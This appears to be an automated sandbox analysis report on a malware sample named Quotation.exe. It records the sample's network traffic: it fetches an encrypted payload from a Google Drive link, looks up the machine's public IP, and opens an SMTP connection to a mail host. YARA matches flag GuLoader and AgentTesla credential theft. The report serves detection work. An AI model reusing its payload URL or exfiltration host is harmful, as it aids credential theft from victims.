                                                                                            Nov 5, 2024 15:07:54.547780991 CET192.168.2.71.1.1.10x48f2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:00.033849955 CET192.168.2.71.1.1.10x14cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:01.957158089 CET192.168.2.71.1.1.10xa5fdStandard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:02.964685917 CET192.168.2.71.1.1.10xa5fdStandard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Nov 5, 2024 15:07:53.080282927 CET1.1.1.1192.168.2.70x7f30No error (0)drive.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:07:54.555398941 CET1.1.1.1192.168.2.70x48f2No error (0)drive.usercontent.google.com142.250.184.225A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:00.281764984 CET1.1.1.1192.168.2.70x14cNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:00.281764984 CET1.1.1.1192.168.2.70x14cNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:00.281764984 CET1.1.1.1192.168.2.70x14cNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:03.157463074 CET1.1.1.1192.168.2.70xa5fdNo error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:03.157463074 CET1.1.1.1192.168.2.70xa5fdNo error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:03.158066988 CET1.1.1.1192.168.2.70xa5fdNo error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                                                            Nov 5, 2024 15:08:03.158066988 CET1.1.1.1192.168.2.70xa5fdNo error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • api.ipify.org
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749936172.217.18.144431516C:\Users\user\Desktop\Quotation.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-05 14:07:54 UTC216OUTGET /uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Host: drive.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2024-11-05 14:07:54 UTC1610INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Tue, 05 Nov 2024 14:07:54 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'nonce-HRoSPMaWLOAB3kiUwIwfdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.749947142.250.184.2254431516C:\Users\user\Desktop\Quotation.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-05 14:07:55 UTC258OUTGET /download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-11-05 14:07:58 UTC4927INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Security-Policy: sandbox
                                                                                            Content-Security-Policy: default-src 'none'
                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                            X-Content-Security-Policy: sandbox
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Content-Disposition: attachment; filename="rdUaNvnbGprIsBLOHb175.bin"
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Credentials: false
                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 240192
                                                                                            Last-Modified: Tue, 05 Nov 2024 11:56:59 GMT
                                                                                            X-GUploader-UploadID: AHmUCY1C0zBojGGQc3-pPsX_RmlCkCkJnDrtHsjmTg5asF7x_acvhLTlBnr_obVjAq-z8k6-vlXkIM8pnA
                                                                                            Date: Tue, 05 Nov 2024 14:07:57 GMT
                                                                                            Expires: Tue, 05 Nov 2024 14:07:57 GMT
                                                                                            Cache-Control: private, max-age=0
                                                                                            X-Goog-Hash: crc32c=dK1fKg==
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-11-05 14:07:58 UTC4927INData Raw: 34 d6 a6 65 bf ad 83 c0 ad ce 8f 9e 33 63 3b b0 93 70 84 ae 10 11 ee 61 21 d6 e9 ea c1 4d 6c c9 73 5e 15 6b 37 a7 aa 1d f5 eb 4d cc 54 14 02 70 53 68 63 c5 43 e1 bf d6 5b fb 76 95 92 34 0a 7f 2c 4a b3 b1 3c 29 0f eb d7 48 dc 09 d0 72 cd 4d 25 90 44 6e 24 48 13 41 34 62 37 a7 25 5d f8 6d 81 94 7c 30 45 8c 54 25 db 1f d6 e7 a8 5e 98 8a ca dd b6 d1 12 9d 21 c2 3b 4e bc 37 f3 8f de 49 8b b9 55 8c 24 f0 56 48 cb a4 f8 cf 6d 76 1a ef 66 9b ff 90 e8 b7 f0 db 39 01 e1 7e b5 51 66 67 e6 a1 29 08 e6 26 05 dd 2b 59 ab 7b 85 2f 59 27 04 be 6e bc e2 3a 7a 4c 42 d0 11 88 10 40 ae 94 e4 d8 08 eb f3 9e e6 2a 0d 77 71 c0 3f 15 ea cf 60 f7 71 41 87 a1 76 20 bc c4 97 47 e3 09 23 72 d7 23 38 04 2a 9f 56 e4 29 ee a2 70 a2 aa e9 ec 5e df 58 e7 4c 6f 4e ad ec 0a 11 55 87 1f 52
                                                                                            Data Ascii: 4e3c;pa!Mls^k7MTpShcC[v4,J<)HrM%Dn$HA4b7%]m|0ET%^!;N7IU$VHmvf9~Qfg)&+Y{/Y'n:zLB@*wq?`qAv G#r#8*V)p^XLoNUR
                                                                                            2024-11-05 14:07:58 UTC4843INData Raw: ae 8b eb 14 93 42 33 75 81 08 86 e9 bd d0 bd fd b3 36 5e e1 9a 56 1b 63 60 d9 19 82 be ca 46 74 fb e9 29 ef 30 da 6f e8 f4 a2 68 f1 90 cd 23 31 1a ab 4e 21 7f 40 90 69 98 db 05 06 95 16 7b 1e aa 4f 69 5a 13 19 df e4 66 3a 1a 15 16 2a df f2 e3 05 d9 9a c7 65 91 ac a5 56 88 7b ec 1a ec 35 01 cd 2a 09 43 73 1b d5 f5 bc 94 f2 eb 53 31 c3 2f 34 a1 58 81 66 71 e4 e2 f4 83 ac 1e 70 e9 2b 81 59 e3 25 58 5b 0d 6d db c0 d6 8a 17 90 08 68 52 c2 2b 3b 82 99 c9 1b c8 9e 56 a5 c4 57 91 69 f3 a0 72 91 9c 92 7c e2 32 04 94 37 a8 3b b5 a4 c5 f3 a3 01 a0 02 65 2a ad 7c a8 88 11 2b b8 2d f0 47 1c c5 d2 31 32 ff eb 10 55 fd b4 83 00 3c d8 95 88 16 db f6 eb 35 1e 9b 07 d2 a0 ec 42 b8 54 39 6c bb 3d b5 6a 5d 5d 38 6d 14 5a 12 16 df cb 36 df 22 75 af 2f 77 bb 99 1b d5 a4 8b 8d
                                                                                            Data Ascii: B3u6^Vc`Ft)0oh#1N!@i{OiZf:*eV{5*CsS1/4Xfqp+Y%X[mhR+;VWir|27;e*|+-G12U<5BT9l=j]]8mZ6"u/w
                                                                                            2024-11-05 14:07:58 UTC1324INData Raw: 2f 2a d5 0f a1 69 af 3c a3 2e 5d 9d 95 7e ec dd 80 7c 45 20 90 91 2a 25 6e 75 05 f3 01 bf ec b5 85 d3 72 8f 36 1c f9 59 a3 d6 2f 37 48 e5 5a 1c 02 82 02 55 6b 81 71 05 7e 18 d8 22 c8 4d 3d 51 1e 01 ba e0 5c 55 2d 4d 3d 3e 2c cd a8 3c 74 25 3a e0 29 da c7 ce 80 7b 78 77 eb 67 a9 4d aa 52 a9 8c 16 b3 15 67 71 7d ef b9 4c 86 fc d1 3f d2 ff da 0d 83 c2 b6 e7 e8 53 92 5b a6 24 ae 7f 25 2c c4 cf ad 47 08 98 19 a8 89 17 c0 21 d3 4f 5e a4 3a fd 11 80 64 6b db 7e 82 42 bb dc 66 c9 eb 2a 0f 45 c8 ee 4c 8c 7a 97 fe 74 e1 c8 ca ae e3 83 f8 14 ff 3b 07 86 97 ff 76 af 20 02 6c 24 58 62 68 9b 04 86 af d2 e6 fd 57 79 43 05 eb f1 9e d7 5f 1b 34 4d 98 2c 5d de c2 9a ff a1 a0 5e 43 78 2c 3a f6 b0 16 3f 0a 4e ad b9 f8 a1 fd 63 7c 20 fa 21 03 af c2 50 70 26 1d 64 dd 02 99 b3
                                                                                            Data Ascii: /*i<.]~|E *%nur6Y/7HZUkq~"M=Q\U-M=>,<t%:){xwgMRgq}L?S[$%,G!O^:dk~Bf*ELzt;v l$XbhWyC_4M,]^Cx,:?Nc| !Pp&d
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: 26 4c 85 10 4d bc 1d f6 6c a9 ae 36 a0 d1 18 5b 76 63 40 c8 ba 13 c4 da 91 2b 87 48 da 85 95 89 8c be 77 48 a2 fe 5e 70 95 af f1 5c 2b f1 87 82 68 81 01 53 94 f2 e8 a6 60 64 76 f2 8f a3 64 e8 21 11 7e 65 c1 88 2c 25 c3 df 62 74 61 94 53 9b 85 a5 1a 4c 3f cd 92 4c 9f 27 e0 44 ac 59 6e fa 5d 40 41 4d 88 5b 4f 4b 10 4f 37 b0 35 60 79 ba 17 51 e4 fa ec bc 8c 5b 04 17 b8 c5 66 0f 40 2f 28 da 0f b9 75 ae 3c a3 d0 a2 a8 98 7e cc d8 b8 bf 47 de 91 88 26 25 6e 75 05 f1 0d bf 12 47 88 df 32 b5 24 1c f9 79 5b d7 16 2c b6 eb 59 e2 0e 78 0e 7e 55 a1 73 0f f2 5c 26 23 f0 a2 33 51 1e df a5 e0 5c ab dd 42 31 1e 2f 33 a4 30 8a 0b 3d e0 29 24 35 cc b9 79 7c 77 eb 99 5d 4c 93 59 96 8c 16 47 3c 77 71 01 8c d3 14 aa 42 dd 3d d8 ff d8 08 83 ca b1 e7 e8 78 92 5b aa 24 8e 84 29
                                                                                            Data Ascii: &LMl6[vc@+HwH^p\+hS`dvd!~e,%btaSL?L'DYn]@AM[OKO75`yQ[f@/(u<~G&%nuG2$y[,Yx~Us\&#3Q\B1/30=)$5y|w]LYG<wqB=x[$)
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: f3 b3 7d 18 3f 9f 4b f5 c8 e1 b3 6e c6 37 87 56 6e 63 ac 0e 6a 17 60 a9 30 1c cf 5e 2e 40 ce b3 85 8e ed 68 08 88 26 2a e9 52 4c a6 91 14 df e4 d1 f3 8a 11 8b d6 14 5d ac 2f 5f 39 53 be 3a 6d e8 a2 77 ab 06 d4 c4 58 5a d8 42 bf 60 6d b8 1d d6 65 57 a0 35 5e df e5 57 75 9d 6c ce ba 33 cf 24 90 12 6f 49 e3 a5 6b 85 8c 40 80 44 a3 85 7a d1 6a 54 f0 71 2c f1 fc e5 96 8f 06 3c af 0c e4 a3 40 48 76 f2 8f 5d 94 ea 18 1b 80 69 c2 88 2c 24 c3 df 62 74 6e ae 59 9b 7b a9 19 6c 1e cb 92 4c 61 d7 e2 7d a9 a7 62 f9 65 65 4d 4d 88 63 47 b4 d6 b5 1d b0 35 58 6f 8a 14 51 c5 25 11 43 7b 25 48 06 98 cf 98 06 41 d1 d8 d0 0d 81 8e a6 3f a3 f8 6f a4 9b 78 c6 dd a3 8f 42 20 80 b0 30 25 65 75 fb ec 2d bf ec 4b 89 21 7c ac 24 24 8a 59 5d d7 16 d2 44 e6 5a c2 0c 86 02 7d ab 80 48
                                                                                            Data Ascii: }?Kn7Vncj`0^.@h&*RL]/_9S:mwXZB`meW5^Wul3$oIk@DzjTq,<@Hv]i,$btnY{lLa}beeMMcG5XoQ%C{%HA?oxB 0%eu-K!|$$Y]DZ}H
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: 9b 23 2c ac ee 42 34 06 00 66 cb 40 85 6b 7d 58 c6 61 16 a4 e2 1f df cb a7 cb 22 75 85 56 45 ba 99 e1 2a 91 8c 8d 1c e2 a4 97 14 fc 55 3a fe b0 54 87 02 d6 77 98 44 01 cf 8f 66 2b a7 d1 c8 f0 0a bc ed dc b8 06 9b 9c 02 e6 b3 45 99 c1 96 4a f5 16 ed b1 6e e6 09 29 56 6e 9d 8d 35 76 17 60 57 c0 16 cf 5e ab 38 cd b3 a1 a2 b1 68 08 7c 1d be e7 52 4c 86 ab 9b df e4 2f dd 8d 11 8b 28 e6 51 af 0f 5d c7 5f bd c4 4c d9 b0 77 ab f8 f5 fd 56 5a d8 bc 89 10 6d 98 1e f6 6c 57 5e 3b a2 d1 e6 a9 79 61 60 ed ba 13 c4 24 6e 13 a8 42 da 85 6b 85 ac bf 89 44 a3 00 10 d3 6a 50 f0 70 2f f1 a7 81 96 8f 02 ad 95 35 e1 a5 60 44 4e f7 8f a3 9a d1 62 e4 81 9a 3f 81 0c 24 b8 aa 62 8a 6b b2 ad 95 7a a9 e7 41 1f cb ba 11 9f d9 eb 83 a0 59 6e 81 11 45 41 49 a0 65 b9 b5 e9 4e 14 b0 35
                                                                                            Data Ascii: #,B4f@k}Xa"uVE*U:TwDf+EJn)Vn5v`W^8h|RL/(Q]_LwVZmlW^;ya`$nBkDjPp/5`DNb?$bkzAYnEAIeN5
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: 21 c4 29 c5 85 5e e5 19 c8 60 a4 ae c4 25 b3 12 87 d0 0f a4 ef 10 7c 1c 4e 2e 8f 1f a0 31 c8 d6 b7 e8 a7 21 91 2a 70 2a 53 78 56 86 12 d5 4a 20 f3 67 6c da d2 31 bc d6 c4 02 55 f7 c6 3a 09 3c a8 95 d2 16 db fa b6 19 1f 9b 03 d2 a2 ee 42 ca f9 35 6c cb 60 8c 6b 5d 59 38 60 2f 79 ec 1f df 35 50 c7 22 5d e0 52 45 bc 67 16 2a a8 a9 fe 1c e2 9c 6c 15 a3 6c 0f ae 4f ab 58 22 d6 77 98 a1 3f cd 8f 86 d5 ab d1 c4 d0 1d ad cd dc 46 07 a2 68 0c e4 b3 57 38 d9 96 4a f5 16 ef b3 6e c6 f6 25 56 6e 43 c6 0c 6a 17 9e 56 07 15 cf 5e d0 66 ed f8 a5 8a ed 96 06 76 27 13 19 5e 4c a6 89 fa df e4 d1 2d 8e 28 a9 d6 ea 53 51 26 5f c7 7a c6 4e 4d e0 a6 05 27 fc d5 8d 7e 41 d8 42 8d 6d 19 b8 1d f2 4c 35 a0 35 a0 2f e8 57 75 63 9e c1 ba 13 e4 16 90 12 91 b6 db bc 61 85 8c be a3 64
                                                                                            Data Ascii: !)^`%|N.1!*p*SxVJ gl1U:<B5l`k]Y8`/y5P"]REg*llOX"w?FhW8Jn%VnCjV^fv'^L-(SQ&_zNM'~ABmL55/Wucad
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: c0 5f 1a 1e 15 e8 24 21 f3 da dd d5 9a c7 37 83 ac a5 26 5e 70 d5 38 ea 1d 09 33 23 0f bd 5a 60 a1 d5 bd 90 80 39 7f 36 b1 07 29 81 5d 8b 1b 05 1a ec f4 a3 b8 e0 7c ed d5 af 5b e3 25 a6 a9 0c 54 7a fc d6 8a e9 62 08 51 36 c4 29 3b 7a 6e c6 19 e8 10 5a a7 c4 65 fd 94 0c 2f 2f 9d 9d 92 78 e2 30 06 94 1f 5e 37 b5 a2 97 e0 a3 01 d0 d4 71 13 a7 76 56 86 38 0b 4f 20 f3 47 90 d4 d2 31 42 29 f1 10 55 d7 ff c4 00 3c 56 bc a6 01 db fc 96 e4 16 9a 03 0c a1 ee 42 ca 47 96 93 34 bf a5 51 5d 59 c6 9f 18 5a ec 1f 21 c7 59 c7 02 50 a5 52 45 44 98 26 09 a8 89 8d e2 eb 9c 92 31 87 21 02 ac 4b d9 a6 2c d6 07 b0 44 31 cd 85 fb 5f a7 d1 c0 d0 2c ad cd dc 46 08 9b 62 0c 1a bf 7d 18 e1 bd 4a f5 e8 1f b2 57 e4 08 29 56 90 6a 8c 0c 4f 6c 14 57 3e 1b bd b4 d4 4c bd 9b be 8a ed 62
                                                                                            Data Ascii: _$!7&^p83#Z`96)]|[%TzbQ6);znZe//x0^7qvV8O G1B)U<VBG4Q]YZ!YPRED&1!K,D1_,Fb}JW)VjOlW>Lb
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: ed 32 78 9c ef 14 b9 3c 47 75 81 f2 a7 e8 ac d0 bd 03 43 3a 5f e1 9a 54 1b 63 60 d6 19 82 be ca 49 49 f1 e9 d7 e3 1e fa 43 e9 f4 a2 96 01 91 f4 31 cf 16 ab 3d 15 2d 40 9a 97 68 db 3c 04 97 16 7b e0 5d 41 6d 7f 68 93 d3 e0 62 68 94 10 16 5a 09 e8 da 23 d3 e7 b3 17 90 a8 85 75 a0 71 ec e4 e4 1d 09 cd d4 03 bd 7f 3b df d5 bd 94 0c ea 42 14 c1 2f 32 7f 54 81 66 54 61 98 f0 83 a8 92 e8 e8 2b d1 73 f8 25 58 af 71 20 5a c0 d2 aa e2 9c 09 68 df ca 29 3b 84 99 cb 19 c8 40 57 a7 c4 25 68 68 ca f2 0f a0 9d 6c 71 1c 3e 23 ef 6b a0 3b b1 d0 11 ed a3 71 f8 31 70 2a a7 0b 22 86 12 2f 66 2e f3 47 6e 24 dc 31 42 d7 03 1c 55 f7 e6 c7 00 3c a8 43 9e 2f cc fc 96 1a e1 92 02 2c 8c e6 42 ca 07 79 a0 3c bf 7a 4b 59 59 c6 61 e8 54 ec 1f df 35 55 c7 22 55 ed 52 45 ba 67 1e 12 bf
                                                                                            Data Ascii: 2x<GuC:_Tc`IIC1=-@h<{]AmhbhZ#uq;B/2TfTa+s%Xq Zh);@W%hhlq>#k;q1p*"/f.Gn$1BU<C/,By<zKYYaT5U"UREg
                                                                                            2024-11-05 14:07:58 UTC1378INData Raw: c7 c8 f1 02 3c da 58 7b a7 07 99 9e 68 bc 3a 25 74 ca f0 42 f1 01 d6 dd c5 41 90 91 4f f1 a9 bf 04 f5 a8 cc 9d 97 55 dc 7d 35 47 1f 51 39 aa 68 06 01 89 eb 7d d6 73 49 fa bb d0 3f 98 44 d5 d4 48 1c 54 b1 7e 22 87 5e 78 fa 42 50 87 11 1d b2 41 13 02 81 f6 87 90 72 21 42 02 6d 68 5f e1 64 a6 15 63 40 dd e7 8e be 34 68 44 fb e9 d7 1d 35 e3 6d e9 f4 a2 96 06 91 f4 14 4a 6e ab 3d 31 0d 72 9c 97 e6 f2 1e 26 97 1c 06 6a 54 41 69 7a 26 e7 d3 e0 98 14 1e 15 16 d4 2d f3 da 03 80 9a c7 17 6e ad 9c 2c a0 71 ec 30 ca 47 09 cd 2a f1 b3 7f 1b d5 2b b1 94 f2 cb 58 36 c1 2f cc 80 64 8b 66 71 1a c6 d0 a7 ac e0 7c 13 25 a1 5b e3 db 54 a5 0c 74 42 c0 d6 8a 17 9d 30 7f 21 c4 29 c5 8d 66 c7 39 ee 60 5a a7 84 12 61 96 0c f0 16 a0 9d 92 86 12 3e 06 94 e1 ac 3b b5 82 c6 e8 a3 01
                                                                                            Data Ascii: <X{h:%tBAOU}5GQ9h}sI?DHT~"^xBPAr!Bmh_dc@4hD5mJn=1r&jTAiz&-n,q0G*+X6/dfq|%[TtB0!)f9`Za>;


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.749977172.67.74.1524431516C:\Users\user\Desktop\Quotation.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-05 14:08:00 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-11-05 14:08:01 UTC399INHTTP/1.1 200 OK
                                                                                            Date: Tue, 05 Nov 2024 14:08:01 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8ddd69d6385aea8c-DFW
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1104&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2454237&cwnd=228&unsent_bytes=0&cid=ee100958b2a2e21d&ts=192&x=0"
                                                                                            2024-11-05 14:08:01 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                                            Data Ascii: 173.254.250.76


                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Nov 5, 2024 15:08:03.887131929 CET5874999367.23.226.139192.168.2.7220-super.nseasy.com ESMTP Exim 4.96.2 #2 Tue, 05 Nov 2024 09:08:03 -0500
                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                            220 and/or bulk e-mail.
                                                                                            Nov 5, 2024 15:08:03.887388945 CET49993587192.168.2.767.23.226.139EHLO 124406
                                                                                            Nov 5, 2024 15:08:04.036858082 CET5874999367.23.226.139192.168.2.7250-super.nseasy.com Hello 124406 [173.254.250.76]
                                                                                            250-SIZE 52428800
                                                                                            250-8BITMIME
                                                                                            250-PIPELINING
                                                                                            250-PIPECONNECT
                                                                                            250-STARTTLS
                                                                                            250 HELP
                                                                                            Nov 5, 2024 15:08:04.037050962 CET49993587192.168.2.767.23.226.139STARTTLS
                                                                                            Nov 5, 2024 15:08:04.190404892 CET5874999367.23.226.139192.168.2.7220 TLS go ahead

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:09:07:03
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\user\Desktop\Quotation.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'182'800 bytes
                                                                                            MD5 hash:816B7984251EE4C846A7F0D6160624E2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1666164955.00000000059B8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:10:51:26
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\user\Desktop\Quotation.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Quotation.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'182'800 bytes
                                                                                            MD5 hash:816B7984251EE4C846A7F0D6160624E2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:30.4%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:18.4%
                                                                                              Total number of Nodes:824
                                                                                              Total number of Limit Nodes:18
                                                                                              execution_graph 3279 73c612c6 3282 73c6101b 3279->3282 3289 73c6156c 3282->3289 3284 73c61020 3285 73c61024 GlobalAlloc 3284->3285 3286 73c61032 3284->3286 3285->3286 3287 73c615c5 3 API calls 3286->3287 3288 73c61038 3287->3288 3291 73c61572 3289->3291 3290 73c61578 3290->3284 3291->3290 3292 73c61584 GlobalFree 3291->3292 3292->3284 3293 73c610c7 3304 73c610f8 3293->3304 3294 73c612be GlobalFree 3295 73c61258 GlobalFree 3295->3304 3296 73c611d7 GlobalAlloc 3296->3304 3297 73c612ba 3297->3294 3298 73c61548 3 API calls 3298->3304 3299 73c61296 GlobalFree 3299->3304 3300 73c615eb 2 API calls 3302 73c611ca GlobalFree 3300->3302 3301 73c61638 lstrcpyW 3305 73c611ab GlobalFree 3301->3305 3302->3304 3303 73c61165 GlobalAlloc 3303->3304 3304->3294 3304->3295 3304->3296 3304->3297 3304->3298 3304->3299 3304->3300 3304->3301 3304->3303 3305->3304 3306 73c61cc7 3307 73c61cee 3306->3307 3308 73c61d2f GlobalFree 3307->3308 3309 73c61d4e __alldvrm 3307->3309 3308->3309 3310 73c615eb 2 API calls 3309->3310 3311 73c61de5 GlobalFree GlobalFree 3310->3311 3312 73c61aa7 3313 73c6156c GlobalFree 3312->3313 3316 73c61abf 3313->3316 3314 73c61b01 GlobalFree 3315 73c61add 3315->3314 3316->3314 3316->3315 3317 73c61aed VirtualFree 3316->3317 3317->3314 3116 73c61a4a 3117 73c61aa1 3116->3117 3118 73c61a5a VirtualProtect 3116->3118 3118->3117 3322 73c62c6a 3323 73c62cc3 3322->3323 3324 73c62ccd GetLastError 3323->3324 3325 73c62cd8 3323->3325 3324->3325 3326 73c61b0a 3327 73c61b38 3326->3327 3328 73c62351 21 API calls 3327->3328 3329 73c61b3f 